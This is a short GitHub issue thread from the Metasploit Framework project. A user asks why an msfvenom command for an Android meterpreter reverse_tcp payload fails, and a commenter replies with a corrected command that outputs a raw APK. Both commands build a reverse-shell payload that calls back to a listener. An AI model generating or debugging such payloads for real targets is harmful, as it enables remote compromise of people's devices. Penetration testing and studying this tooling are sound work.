### ISSUE TITLE
MSFVENOM @ortholinux

### ISSUE THREAD

**Issue by Yuvateja809** [rapid7/metasploit-framework#14107]
#msfvenom  --payload android/meterpreter/reverse_tcp  LHOST=192.168.43.212 LPORT=4444 -f exe - o one.exe
hai i used to create .exe payload and i got some error .
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10191 bytes
Error: The payload could not be generated, check options
┌─[✗]─[root@parrot]─[/home/administrator]

let me know how to solve the error please brother .

**Comment by timwr** [comment]
The output format should be raw, not exe:
msfvenom --payload android/meterpreter/reverse_tcp LHOST=192.168.43.212 LPORT=4444 -f raw - o one.apk
